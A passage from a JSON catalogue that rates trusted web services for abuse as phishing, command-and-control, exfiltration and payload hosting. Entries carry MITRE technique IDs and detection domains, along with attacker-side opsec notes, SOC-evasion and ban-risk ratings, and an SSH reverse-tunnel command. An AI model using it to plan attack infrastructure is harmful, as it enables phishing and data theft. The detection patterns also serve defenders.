      }
    ],
    "detection": [
      "*.hubspot.com",
      "*.hs-sites.com",
      "*.hubspotpagebuilder.com",
      "api.hubapi.com",
      "app.hubspot.com",
      "forms.hubspot.com",
      "*.hubspot.net",
      "HubSpot landing pages (*.hs-sites.com) for phishing",
      "HubSpot forms (forms.hubspot.com) for credential harvesting",
      "HubSpot tracking links in phishing email chains"
    ],
    "notes": "Free CRM with built-in email sending (2000/mo), landing page builder, and form builder. All-in-one phishing infrastructure on a trusted enterprise domain. Landing pages on *.hs-sites.com",
    "customDomain": true,
    "customDomainNotes": "Custom domains on Marketing Hub (landing pages)",
    "dataRetention": "Permanent (1M contacts free CRM)",
    "rateLimits": "API: 100 calls/10s",
    "maxFileSize": "N/A",
    "logging": "Audit log on Enterprise. Email analytics"
  },
  {
    "name": "Postman",
    "url": "https://postman.com",
    "category": "C2 Channel",
    "provider": "Postman",
    "signup": "email",
    "signupTime": "~2min",
    "domains": [
      "postman.com",
      "*.getpostman.com"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 0,
      "c2": 1,
      "exfil": 1,
      "payload": 0,
      "creds": 0
    },
    "apiEndpoints": [
      "api.getpostman.com/*"
    ],
    "opsec": "low",
    "opsecNotes": "Public workspaces can host collections with encoded C2 data. Mock servers as C2 endpoints. API environment variables for exfil",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "API testing is normal developer behavior. Public workspaces rarely moderated",
    "verification": "Email only. Google SSO. No CC for free",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Free: 25 collection runs/mo, 1000 mock server calls/mo, 3 shared workspaces, unlimited API requests"
    },
    "sso": {
      "saml": true,
      "oidc": false,
      "scim": true,
      "oauth": true,
      "mfa": true,
      "notes": "SAML/SCIM on Enterprise. OAuth for API"
    },
    "knownC2": [],
    "exfilTools": [],
    "mitre": [
      "T1102.002",
      "T1567.002"
    ],
    "refs": [
      {
        "title": "Postman Pricing",
        "url": "https://www.postman.com/pricing/"
      }
    ],
    "detection": [
      "*.postman.co",
      "*.postman.com",
      "api.getpostman.com",
      "*.postman-echo.com",
      "go.postman.co",
      "web.postman.co",
      "documenter.getpostman.com",
      "Public Postman workspaces leaking API keys/tokens/secrets",
      "CMD365 backdoor masqueraded as Postman application (Graph API C2)"
    ],
    "notes": "Public workspaces for C2 dead drops via collection variables. Mock servers as disposable C2 HTTP endpoints. Environment variables for exfil data. Developer trusted platform - zero SOC coverage",
    "customDomain": false,
    "customDomainNotes": "N/A - API testing",
    "dataRetention": "Permanent (public workspaces)",
    "rateLimits": "Mock server: 1000 calls/mo free",
    "maxFileSize": "N/A",
    "logging": "Team activity feed on paid"
  },
  {
    "name": "Imgur",
    "url": "https://imgur.com",
    "category": "Storage",
    "provider": "Imgur",
    "signup": "none",
    "signupTime": "0",
    "domains": [
      "i.imgur.com",
      "imgur.com"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 0,
      "c2": 1,
      "exfil": 1,
      "payload": 1,
      "creds": 0
    },
    "apiEndpoints": [
      "api.imgur.com/3/*"
    ],
    "opsec": "low",
    "opsecNotes": "Image hosting for steganographic payloads. Direct image links. API available. No account for anonymous uploads",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Anonymous uploads. Minimal content moderation for images",
    "verification": "No account needed for anonymous uploads. Email for registered",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Free: anonymous uploads, 20MB images, API 12.5k req/day. Direct i.imgur.com links"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": true,
      "mfa": false,
      "notes": "OAuth for API. Google login"
    },
    "knownC2": [],
    "exfilTools": [],
    "mitre": [
      "T1102.002",
      "T1027.003",
      "T1105"
    ],
    "refs": [
      {
        "title": "Imgur API",
        "url": "https://apidocs.imgur.com/"
      }
    ],
    "detection": [
      "i.imgur.com/*"
    ],
    "notes": "Image hosting for steganographic C2/payloads. Embed encoded data in PNG/JPEG pixel data. Direct i.imgur.com links for payload delivery. Anonymous uploads without account. API for automation",
    "customDomain": false,
    "customDomainNotes": "N/A - image hosting",
    "dataRetention": "Permanent (if account linked). Anonymous: may expire",
    "rateLimits": "API: 12.5k req/day",
    "maxFileSize": "20MB per image",
    "logging": "No audit logs"
  },
  {
    "name": "Blogger / Blogspot",
    "url": "https://blogger.com",
    "category": "Phishing",
    "provider": "Google",
    "signup": "email",
    "signupTime": "~2min",
    "domains": [
      "*.blogspot.com",
      "blogger.com"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 1,
      "exfil": 0,
      "payload": 0,
      "creds": 1
    },
    "apiEndpoints": [
      "www.googleapis.com/blogger/v3/*"
    ],
    "opsec": "low",
    "opsecNotes": "*.blogspot.com is a trusted Google domain. Blog posts for C2 dead drops. HTML editing for credential pages",
    "socDetection": "unlikely",
    "banRisk": "medium",
    "banNotes": "Google removes phishing blogs when reported. Automated scanning exists",
    "verification": "Google account only",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Free: unlimited blogs, 15GB storage (shared with Google account), custom domain, API available"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": true,
      "mfa": true,
      "notes": "Google OAuth for API. Part of Google account"
    },
    "knownC2": [],
    "exfilTools": [],
    "mitre": [
      "T1102.002",
      "T1566.002",
      "T1583.006"
    ],
    "refs": [
      {
        "title": "Blogger",
        "url": "https://www.blogger.com/"
      },
      {
        "title": "Blogger API",
        "url": "https://developers.google.com/blogger/docs/3.0/getting_started"
      }
    ],
    "detection": [
      "*.blogspot.com"
    ],
    "notes": "*.blogspot.com is a trusted Google domain. Blog posts as C2 dead drops. Full HTML editing for credential harvesting pages. Blogger API for automated post creation/modification. Custom domains supported",
    "customDomain": true,
    "customDomainNotes": "Custom domains supported on Blogger (free)",
    "dataRetention": "Permanent",
    "rateLimits": "Blogger API: 10k queries/day",
    "maxFileSize": "N/A",
    "logging": "Blog stats dashboard. Google Workspace Audit if applicable"
  },
  {
    "name": "Medium",
    "url": "https://medium.com",
    "category": "Phishing",
    "provider": "Medium",
    "signup": "email",
    "signupTime": "~2min",
    "domains": [
      "medium.com",
      "*.medium.com"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 1,
      "exfil": 0,
      "payload": 0,
      "creds": 0
    },
    "apiEndpoints": [],
    "opsec": "low",
    "opsecNotes": "Articles for C2 dead drops via content updates. Trusted domain for social engineering links",
    "socDetection": "unlikely",
    "banRisk": "medium",
    "banNotes": "Medium moderates content. Articles removed for TOS violations. Custom domains supported on publications",
    "verification": "Email or Google/Twitter/Facebook. No CC for free",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": false,
      "trialDays": null,
      "limits": "Free: 3 articles/day, unlimited reads. Custom domains on publications"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": true,
      "mfa": true,
      "notes": "Google/Twitter/Facebook OAuth. No enterprise SSO"
    },
    "knownC2": [],
    "exfilTools": [],
    "mitre": [
      "T1102.002",
      "T1566.002"
    ],
    "refs": [
      {
        "title": "Medium",
        "url": "https://medium.com/"
      }
    ],
    "detection": [
      "medium.com",
      "*.medium.com",
      "cdn-images-1.medium.com",
      "medium.com/@*",
      "*.medium.com/feed",
      "Phishing pretexts: Medium article links in spearphishing emails",
      "Malware writeups/tutorials hosted on Medium used for technique sharing"
    ],
    "notes": "Trusted domain for social engineering links. Articles as C2 dead drops via content updates. Embed redirect links. Custom publication domains available",
    "customDomain": true,
    "customDomainNotes": "Custom domains on publications",
    "dataRetention": "Permanent",
    "rateLimits": "No public API rate limit",
    "maxFileSize": "N/A",
    "logging": "Stats for published stories"
  },
  {
    "name": "Supabase",
    "url": "https://supabase.com",
    "category": "Cloud",
    "provider": "Supabase",
    "signup": "email",
    "signupTime": "~3min",
    "domains": [
      "*.supabase.co",
      "supabase.com"
    ],
    "trustedDomain": false,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 0,
      "c2": 1,
      "exfil": 1,
      "payload": 1,
      "creds": 0
    },
    "apiEndpoints": [
      "*.supabase.co/rest/v1/*",
      "*.supabase.co/storage/v1/*"
    ],
    "opsec": "low",
    "opsecNotes": "Firebase alternative with Postgres database. Database as C2 backend. Storage for payloads. Edge Functions for serverless C2",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Developer platform. Minimal abuse enforcement",
    "verification": "Email or GitHub OAuth. No CC for free",
    "trust": "low",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Free: 500MB database, 1GB file storage, 2GB bandwidth, 500k Edge Function invocations, 2 projects"
    },
    "sso": {
      "saml": true,
      "oidc": true,
      "scim": false,
      "oauth": true,
      "mfa": true,
      "notes": "SAML on Pro+. Supabase Auth supports SAML/OIDC for app users"
    },
    "knownC2": [],
    "exfilTools": [],
    "mitre": [
      "T1102.002",
      "T1567.002",
      "T1583.006"
    ],
    "refs": [
      {
        "title": "Supabase Pricing",
        "url": "https://supabase.com/pricing"
      }
    ],
    "detection": [
      "*.supabase.co",
      "*.supabase.com",
      "api.supabase.com",
      "*.supabase.in",
      "*.functions.supabase.co",
      "*.storage.supabase.co",
      "Supabase Edge Functions as C2/redirector endpoints",
      "Supabase Storage for payload hosting on *.storage.supabase.co",
      "Supabase Realtime (WebSocket) for C2 communication channel"
    ],
    "notes": "Firebase alternative with full Postgres database as C2 backend. Row-level security for access control. Storage for payload hosting. Edge Functions for serverless C2 logic. REST API auto-generated from schema",
    "customDomain": true,
    "customDomainNotes": "Custom domains on Pro plan",
    "dataRetention": "Permanent (500MB DB, 1GB storage free)",
    "rateLimits": "Edge Functions: 500k invocations/mo free. REST: rate limited",
    "maxFileSize": "50MB per file (Storage)",
    "logging": "Dashboard logs. Postgres logs accessible"
  },
  {
    "name": "Wasabi",
    "url": "https://wasabi.com",
    "category": "Storage",
    "provider": "Wasabi",
    "signup": "email+cc",
    "signupTime": "~5min",
    "domains": [
      "*.wasabisys.com"
    ],
    "trustedDomain": false,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 1,
      "exfil": 1,
      "payload": 1,
      "creds": 0
    },
    "apiEndpoints": [],
    "opsec": "low",
    "opsecNotes": "S3-compatible hot storage. Less monitored than AWS. No egress fees",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Minimal abuse enforcement. Enterprise storage provider",
    "verification": "Email + CC required. Free trial available",
    "trust": "low",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "trial",
      "devAccount": true,
      "trialDays": 30,
      "limits": "Trial: 1TB free for 30 days. S3-compatible API. No egress fees ever"
    },
    "sso": {
      "saml": true,
      "oidc": false,
      "scim": false,
      "oauth": true,
      "mfa": true,
      "notes": "SAML on paid plans. API key auth"
    },
    "knownC2": [],
    "exfilTools": [
      {
        "name": "rclone",
        "url": "https://lolexfil.github.io/#tool=rclone",
        "note": ""
      },
      {
        "name": "Cyberduck",
        "url": "https://lolexfil.github.io/#tool=Cyberduck",
        "note": ""
      },
      {
        "name": "duplicacy",
        "url": "https://lolexfil.github.io/#tool=duplicacy",
        "note": ""
      },
      {
        "name": "duplicati",
        "url": "https://lolexfil.github.io/#tool=duplicati",
        "note": ""
      },
      {
        "name": "restic",
        "url": "https://lolexfil.github.io/#tool=restic",
        "note": ""
      },
      {
        "name": "kopia",
        "url": "https://lolexfil.github.io/#tool=kopia",
        "note": ""
      },
      {
        "name": "s5cmd",
        "url": "https://lolexfil.github.io/#tool=s5cmd",
        "note": ""
      },
      {
        "name": "Arq Backup",
        "url": "https://lolexfil.github.io/#tool=Arq%20Backup",
        "note": ""
      },
      {
        "name": "CloudBerry/MSP360",
        "url": "https://lolexfil.github.io/#tool=CloudBerry%20/%20MSP360%20Backup",
        "note": ""
      },
      {
        "name": "Syncovery",
        "url": "https://lolexfil.github.io/#tool=Syncovery",
        "note": ""
      },
      {
        "name": "Veeam Agent",
        "url": "https://lolexfil.github.io/#tool=Veeam%20Agent",
        "note": ""
      }
    ],
    "mitre": [
      "T1567.002",
      "T1105",
      "T1583.006"
    ],
    "refs": [
      {
        "title": "Wasabi Pricing",
        "url": "https://wasabi.com/pricing/"
      },
      {
        "title": "lolexfil",
        "url": "https://lolexfil.github.io"
      }
    ],
    "detection": [
      "*.wasabisys.com"
    ],
    "notes": "S3-compatible hot storage with NO egress fees - ideal for large exfil. 1TB free trial. rclone target. Less SOC coverage than AWS S3",
    "customDomain": true,
    "customDomainNotes": "Custom domains via CNAME",
    "dataRetention": "Permanent (pay per TB)",
    "rateLimits": "API: S3-compatible rate limits",
    "maxFileSize": "No per-file limit",
    "logging": "Access logs available. Bucket policies"
  },
  {
    "name": "Hostinger",
    "url": "https://hostinger.com",
    "category": "Cloud",
    "provider": "Hostinger",
    "signup": "email",
    "signupTime": "~3min",
    "domains": [
      "*.000webhostapp.com",
      "*.hostingerapp.com"
    ],
    "trustedDomain": false,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 1,
      "exfil": 1,
      "payload": 1,
      "creds": 1
    },
    "apiEndpoints": [],
    "opsec": "low",
    "opsecNotes": "Free hosting on *.000webhostapp.com. PHP support. cPanel access. Popular for phishing infra",
    "socDetection": "moderate",
    "banRisk": "medium",
    "banNotes": "000webhost free tier is well-known for abuse. Accounts suspended on report but new ones easy to create",
    "verification": "Email only for 000webhost free tier. CC for Hostinger paid plans",
    "trust": "low",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "000webhost free: 300MB storage, 3GB bandwidth, PHP/MySQL, 1 site, *.000webhostapp.com subdomain"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": true,
      "mfa": true,
      "notes": "Google OAuth login. No enterprise SSO"
    },
    "knownC2": [],
    "exfilTools": [],
    "mitre": [
      "T1583.006",
      "T1566.002",
      "T1102"
    ],
    "refs": [
      {
        "title": "000webhost Free",
        "url": "https://www.000webhost.com/"
      }
    ],
    "detection": [
      "*.000webhostapp.com",
      "*.hostingerapp.com"
    ],
    "notes": "Free PHP hosting on *.000webhostapp.com. Full cPanel, PHP, MySQL. Quick to set up phishing pages. Accounts are disposable - easy to recreate on ban",
    "customDomain": false,
    "customDomainNotes": "Custom domains on paid plans only. Free: *.000webhostapp.com",
    "dataRetention": "Permanent (300MB storage free)",
    "rateLimits": "No explicit limits on free",
    "maxFileSize": "300MB total storage free",
    "logging": "cPanel logs on free tier"
  },
  {
    "name": "ClickUp",
    "url": "https://clickup.com",
    "category": "Business App",
    "provider": "ClickUp",
    "signup": "email",
    "signupTime": "~2min",
    "domains": [
      "doc.clickup.com",
      "app.clickup.com"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 0,
      "exfil": 0,
      "payload": 0,
      "creds": 0
    },
    "apiEndpoints": [
      "api.clickup.com/api/v2/*"
    ],
    "opsec": "low",
    "opsecNotes": "Public docs on trusted domain for phishing. Task sharing notifications as pretexts",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Enterprise PM tool. Doc sharing is normal behavior",
    "verification": "Email only. Google/SSO login. No CC for free",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Free forever: 100MB storage, unlimited tasks, unlimited members, API access"
    },
    "sso": {
      "saml": true,
      "oidc": true,
      "scim": true,
      "oauth": true,
      "mfa": true,
      "notes": "SAML/OIDC/SCIM on Enterprise. Google SSO on all. OAuth for API"
    },
    "knownC2": [],
    "exfilTools": [],
    "mitre": [
      "T1566.002"
    ],
    "refs": [
      {
        "title": "ClickUp Pricing",
        "url": "https://clickup.com/pricing"
      }
    ],
    "detection": [
      "*.clickup.com",
      "app.clickup.com",
      "api.clickup.com",
      "doc.clickup.com",
      "sharing.clickup.com",
      "ClickUp public docs as phishing redirect pages",
      "ANY.RUN Oct 2025: ClickUp abused to host redirect pages hiding phishing flows",
      "ClickUp + Azure Blob Storage chain for credential harvesting"
    ],
    "notes": "doc.clickup.com for phishing pages on trusted enterprise domain. Task/doc sharing notifications as pretexts. API for automation. Free forever with unlimited members",
    "customDomain": false,
    "customDomainNotes": "N/A - project management",
    "dataRetention": "Permanent (100MB storage free)",
    "rateLimits": "API: 100 req/min",
    "maxFileSize": "N/A",
    "logging": "Audit log on Enterprise"
  },
  {
    "name": "Filebin",
    "url": "https://filebin.net",
    "category": "Storage",
    "provider": "Filebin",
    "signup": "none",
    "signupTime": "0",
    "domains": [
      "filebin.net"
    ],
    "trustedDomain": false,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 0,
      "exfil": 1,
      "payload": 1,
      "creds": 0
    },
    "apiEndpoints": [],
    "opsec": "low",
    "opsecNotes": "No signup. Anonymous uploads. Files expire after 7 days. Direct links",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Open source. No content moderation",
    "verification": "No signup required",
    "trust": "low",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": false,
      "trialDays": null,
      "limits": "Free. No account. No file size limit. Files expire 7 days. Direct download links"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": false,
      "mfa": false,
      "notes": "No auth"
    },
    "knownC2": [],
    "exfilTools": [
      {
        "name": "curl",
        "url": "https://lolexfil.github.io/#tool=curl",
        "note": ""
      }
    ],
    "mitre": [
      "T1567.002",
      "T1105"
    ],
    "refs": [
      {
        "title": "Filebin",
        "url": "https://filebin.net"
      }
    ],
    "detection": [
      "filebin.net"
    ],
    "notes": "Zero signup file sharing. No file size limit. Files auto-expire in 7 days. Direct download links. Open source and self-hostable",
    "customDomain": false,
    "customDomainNotes": "N/A - file sharing",
    "dataRetention": "7 days expiry",
    "rateLimits": "No rate limit stated",
    "maxFileSize": "No per-file limit",
    "logging": "No logging"
  },
  {
    "name": "Tumblr",
    "url": "https://tumblr.com",
    "category": "Phishing",
    "provider": "Automattic",
    "signup": "email",
    "signupTime": "~2min",
    "domains": [
      "*.tumblr.com"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 1,
      "exfil": 0,
      "payload": 0,
      "creds": 0
    },
    "apiEndpoints": [
      "api.tumblr.com/v2/*"
    ],
    "opsec": "low",
    "opsecNotes": "Blog posts for C2 dead drops. Custom HTML themes. Trusted domain still widely whitelisted",
    "socDetection": "unlikely",
    "banRisk": "medium",
    "banNotes": "Tumblr moderates content. Blogs removed on report. Automattic abuse team",
    "verification": "Email only. No CC for free",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Free: unlimited blogs, custom HTML themes, API access, *.tumblr.com subdomain"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": true,
      "mfa": true,
      "notes": "OAuth for API. No enterprise SSO"
    },
    "knownC2": [],
    "exfilTools": [],
    "mitre": [
      "T1102.002",
      "T1566.002",
      "T1583.006"
    ],
    "refs": [
      {
        "title": "Tumblr",
        "url": "https://www.tumblr.com/"
      },
      {
        "title": "Tumblr API",
        "url": "https://www.tumblr.com/docs/en/api/v2"
      }
    ],
    "detection": [
      "*.tumblr.com"
    ],
    "notes": "*.tumblr.com still widely whitelisted. Blog posts for C2 dead drops via API. Custom HTML themes for credential pages. Automattic-owned (same as WordPress.com)",
    "customDomain": true,
    "customDomainNotes": "Custom domains supported (free)",
    "dataRetention": "Permanent",
    "rateLimits": "API: 1000 req/hr per consumer",
    "maxFileSize": "100MB per post. 10MB per image",
    "logging": "No audit logs"
  },
  {
    "name": "iCloud",
    "url": "https://icloud.com",
    "category": "Storage",
    "provider": "Apple",
    "signup": "email",
    "signupTime": "~5min",
    "domains": [
      "icloud.com",
      "*.icloud.com"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 0,
      "exfil": 1,
      "payload": 1,
      "creds": 0
    },
    "apiEndpoints": [],
    "opsec": "low",
    "opsecNotes": "Apple trusted domain. iCloud Drive for exfil. iCloud links for phishing pretexts",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Apple trusted platform. iCloud sharing links rarely flagged",
    "verification": "Apple ID required. Email + phone. CC optional",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": false,
      "trialDays": null,
      "limits": "Free: 5GB iCloud storage. iCloud Drive sharing links. iCloud+ from $0.99/mo for 50GB"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": false,
      "mfa": true,
      "notes": "Apple ID 2FA. No enterprise SSO. Managed Apple IDs for business"
    },
    "knownC2": [],
    "exfilTools": [
      {
        "name": "rclone",
        "url": "https://lolexfil.github.io/#tool=rclone",
        "note": ""
      }
    ],
    "mitre": [
      "T1567.002",
      "T1566.002"
    ],
    "refs": [
      {
        "title": "iCloud Plans",
        "url": "https://support.apple.com/en-us/108047"
      }
    ],
    "detection": [
      "*.icloud.com",
      "*.icloud-content.com",
      "*.apple-cloudkit.com",
      "p*-caldav.icloud.com",
      "p*-contacts.icloud.com",
      "www.icloud.com/iclouddrive/*",
      "iCloud Drive shared links for payload delivery",
      "iCloud Mail (*.mail.me.com) for phishing email origin"
    ],
    "notes": "Apple trusted domain. iCloud Drive sharing links for phishing pretexts. 5GB free. Less commonly associated with attacks than Google/Microsoft - lower SOC awareness",
    "customDomain": false,
    "customDomainNotes": "N/A - cloud storage",
    "dataRetention": "Permanent (5GB free)",
    "rateLimits": "No public API",
    "maxFileSize": "50GB per file",
    "logging": "No detailed audit logs for consumers"
  },
  {
    "name": "DuckDNS",
    "url": "https://duckdns.org",
    "category": "Cloud",
    "provider": "DuckDNS",
    "signup": "email",
    "signupTime": "~1min",
    "domains": [
      "*.duckdns.org"
    ],
    "trustedDomain": false,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 1,
      "exfil": 0,
      "payload": 0,
      "creds": 0
    },
    "apiEndpoints": [
      "www.duckdns.org/update?domains=*"
    ],
    "opsec": "medium",
    "opsecNotes": "Free dynamic DNS. Point *.duckdns.org to your C2 IP. No signup friction. Known to some SOCs",
    "socDetection": "moderate",
    "banRisk": "low",
    "banNotes": "Open source. No enforcement. Community-run",
    "verification": "Login via GitHub/Google/Twitter/Reddit. No email needed. Instant setup",
    "trust": "low",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": false,
      "trialDays": null,
      "limits": "Free: 5 subdomains, dynamic DNS updates via API/cron, instant propagation"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": true,
      "mfa": false,
      "notes": "Social login only"
    },
    "knownC2": [],
    "exfilTools": [],
    "mitre": [
      "T1583.006",
      "T1568.002"
    ],
    "refs": [
      {
        "title": "DuckDNS",
        "url": "https://www.duckdns.org/"
      },
      {
        "title": "Sekoia: Threat Actors Use DuckDNS with Cloudflare Tunnels for RAT C2",
        "url": "https://cyberpress.org/threat-actors-abuse-cloudflare-tunnels/"
      }
    ],
    "detection": [
      "*.duckdns.org"
    ],
    "notes": "Free dynamic DNS for C2 infrastructure. Point *.duckdns.org to your IP. API for automated updates. 5 subdomains free. Known to some SOCs - moderate detection risk. Used alongside Cloudflare Tunnels for RAT C2 endpoints (Sekoia 2025). Common pairing: DuckDNS dynamic DNS + Cloudflare Tunnel for free, resilient C2 infrastructure",
    "customDomain": false,
    "customDomainNotes": "N/A - dynamic DNS",
    "dataRetention": "Permanent (subdomains)",
    "rateLimits": "API: reasonable use policy",
    "maxFileSize": "N/A",
    "logging": "No logging"
  },
  {
    "name": "Localhost.run",
    "url": "https://localhost.run",
    "category": "Cloud",
    "provider": "Localhost.run",
    "signup": "none",
    "signupTime": "0",
    "domains": [
      "*.lhr.life",
      "*.lhrtunnel.link"
    ],
    "trustedDomain": false,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 1,
      "exfil": 0,
      "payload": 0,
      "creds": 0
    },
    "apiEndpoints": [],
    "opsec": "low",
    "opsecNotes": "SSH-based tunnel. No signup. No client install. Less known than ngrok/cloudflare tunnels",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "No enforcement. Ephemeral tunnels",
    "verification": "No signup required. Just SSH: ssh -R 80:localhost:8080 nokey@localhost.run",
    "trust": "low",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": false,
      "trialDays": null,
      "limits": "Free: random subdomain, SSH tunnel only, no install required"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": false,
      "mfa": false,
      "notes": "No auth"
    },
    "knownC2": [],
    "exfilTools": [
      {
        "name": "localhost.run tunnel",
        "url": "https://lolexfil.github.io/#tool=localhost.run",
        "note": ""
      }
    ],
    "mitre": [
      "T1572",
      "T1090.004"
    ],
    "refs": [
      {
        "title": "Localhost.run",
        "url": "https://localhost.run"
      }
    ],
    "detection": [
      "*.lhr.life"
    ],
    "notes": "Zero signup SSH tunnel alternative to ngrok. No client install - just ssh -R. Random subdomains on *.lhr.life. Less known to SOCs than ngrok domains",
    "customDomain": false,
    "customDomainNotes": "N/A - SSH tunnel",
    "dataRetention": "Ephemeral (session-based)",
    "rateLimits": "No rate limit stated",
    "maxFileSize": "N/A",
    "logging": "No logging"
  },
  {
    "name": "RequestBin (Pipedream)",
    "url": "https://requestbin.com",
    "category": "C2 Channel",
    "provider": "Pipedream",
    "signup": "none",
    "signupTime": "0",
    "domains": [
      "*.requestbin.net",
      "requestbin.com"
    ],
    "trustedDomain": false,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 0,
      "c2": 1,
      "exfil": 1,
      "payload": 0,
      "creds": 1
    },
    "apiEndpoints": [
      "*.requestbin.net"
    ],
    "opsec": "medium",
    "opsecNotes": "HTTP request capture. Like webhook.site. Zero signup. Known to security testers",
    "socDetection": "likely",
    "banRisk": "low",
    "banNotes": "No enforcement. Commonly used in security testing",
    "verification": "No signup required",
    "trust": "low",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": false,
      "trialDays": null,
      "limits": "Free: public endpoints, 48hr expiry. Pipedream account for private bins"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": false,
      "mfa": false,
      "notes": "No auth"
    },
    "knownC2": [],
    "exfilTools": [
      {
        "name": "RequestBin collector",
        "url": "https://lolexfil.github.io/#tool=RequestBin%20%28HTTP/DNS%20request%20collector%29",
        "note": ""
      }
    ],
    "mitre": [
      "T1567.002",
      "T1102.002"
    ],
    "refs": [
      {
        "title": "RequestBin",
        "url": "https://requestbin.com"
      }
    ],
    "detection": [
      "*.requestbin.net"
    ],
    "notes": "HTTP request capture service. Zero signup. Exfiltrate credentials/tokens via POST. Now part of Pipedream. Known to security testers - likely in some blocklists",
    "customDomain": false,
    "customDomainNotes": "N/A - webhook collector",
    "dataRetention": "48h free. Private bins with account",
    "rateLimits": "No rate limit on free",
    "maxFileSize": "N/A",
    "logging": "All requests logged in UI"
  },
  {
    "name": "Ideone",
    "url": "https://ideone.com",
    "category": "Paste",
    "provider": "Ideone",
    "signup": "none",
    "signupTime": "0",
    "domains": [
      "ideone.com"
    ],
    "trustedDomain": false,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 0,
      "c2": 1,
      "exfil": 1,
      "payload": 1,
      "creds": 0
    },
    "apiEndpoints": [
      "ideone.com/api/1/*"
    ],
    "opsec": "low",
    "opsecNotes": "Online IDE + paste service. Code execution + output as C2 dead drops. SOAP API available",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Code execution is normal behavior. No abuse monitoring",
    "verification": "No account needed for pastes. Email for registered",
    "trust": "low",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Free: 60+ languages, 15sec execution time, API via SOAP. Public pastes without account"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": false,
      "mfa": false,
      "notes": "No auth for pastes"
    },
    "knownC2": [],
    "exfilTools": [
      {
        "name": "text dump services",
        "url": "https://lolexfil.github.io/#tool=Pastebin%20/%20text%20dump%20services",
        "note": ""
      }
    ],
    "mitre": [
      "T1102.002",
      "T1105"
    ],
    "refs": [
      {
        "title": "Ideone API",
        "url": "https://ideone.com/api"
      }
    ],
    "detection": [
      "ideone.com"
    ],
    "notes": "Online IDE with 60+ languages. Code output as C2 dead drops. SOAP API for automation. Code compilation + execution on their infra. Less monitored than Pastebin",
    "customDomain": false,
    "customDomainNotes": "N/A - online IDE",
    "dataRetention": "Permanent (public pastes)",
    "rateLimits": "SOAP API: rate limited",
    "maxFileSize": "64KB source code limit",
    "logging": "No audit logs"
  },
  {
